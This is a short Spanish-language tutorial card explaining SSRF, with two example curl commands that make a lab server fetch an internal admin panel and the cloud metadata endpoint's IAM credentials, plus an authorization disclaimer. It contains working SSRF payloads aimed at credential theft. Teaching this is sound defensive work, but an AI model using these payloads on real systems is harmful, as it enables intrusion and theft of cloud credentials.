KALI
SSRF: usa el servidor de proxy
En un SSRF, engañas al servidor para que haga peticiones por ti, hacia donde tú no llegas.
Si una web trae una URL que tú controlas, la apuntas a sus servicios internos, como localhost, o a rangos privados que desde internet no ves. En la nube, es aún peor: apuntas al servicio de metadatos y puedes robar credenciales del servidor.
El servidor confía en sí mismo, y tú abusas de esa confianza.
# los comandos
kali@kali:~$ curl 'http://10.0.0.5/fetch?url=http://127.0.0.1:8080/admin'copiar<title>Panel Admin Interno</title> <- acceso interno!
kali@kali:~$ curl 'http://10.0.0.5/fetch?url=http://169.254.169.254/latest/meta-data/iam/'copiarsecurity-credentials/rol-web <- credenciales cloud
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.